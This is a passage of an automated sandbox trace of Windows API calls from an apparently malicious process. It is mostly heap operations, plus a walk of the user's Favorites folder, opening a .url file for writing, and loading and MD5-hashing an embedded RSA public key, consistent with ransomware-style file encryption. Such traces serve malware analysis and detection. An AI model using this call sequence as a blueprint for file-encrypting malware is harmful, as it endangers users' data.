lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.024] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\") returned="Links\\" [0197.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea19f8 [0197.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.025] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0197.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0197.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea19f8 | out: hHeap=0x620000) returned 1 [0197.025] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0197.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0197.025] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0197.025] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.025] PathFindFileNameW (pszPath="") returned="" [0197.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.026] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0197.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.026] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.026] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0197.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0197.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.027] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini") returned=".ini" [0197.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0197.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0197.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0197.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.028] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0197.028] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0197.029] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=226) returned 1 [0197.029] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0197.032] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.032] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0197.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0197.034] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.034] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xe2, lpOverlapped=0x0) returned 1 [0197.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0197.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.035] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0197.036] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0197.037] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.037] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0197.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0197.037] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0197.037] GetLastError () returned 0x0 [0197.037] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0197.037] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0197.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.037] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0197.037] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0197.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.037] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0197.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0197.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0197.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x661a58 [0197.037] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea19f8 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95140 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0197.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0197.038] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0197.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0197.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0197.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f48 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f30 [0197.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0197.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0197.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0197.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0197.042] GetCurrentThreadId () returned 0x66c [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5770 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.042] GetCurrentThreadId () returned 0x66c [0197.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0197.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0197.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0197.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0197.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0197.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f48 [0197.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0197.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0197.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fa8 [0197.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 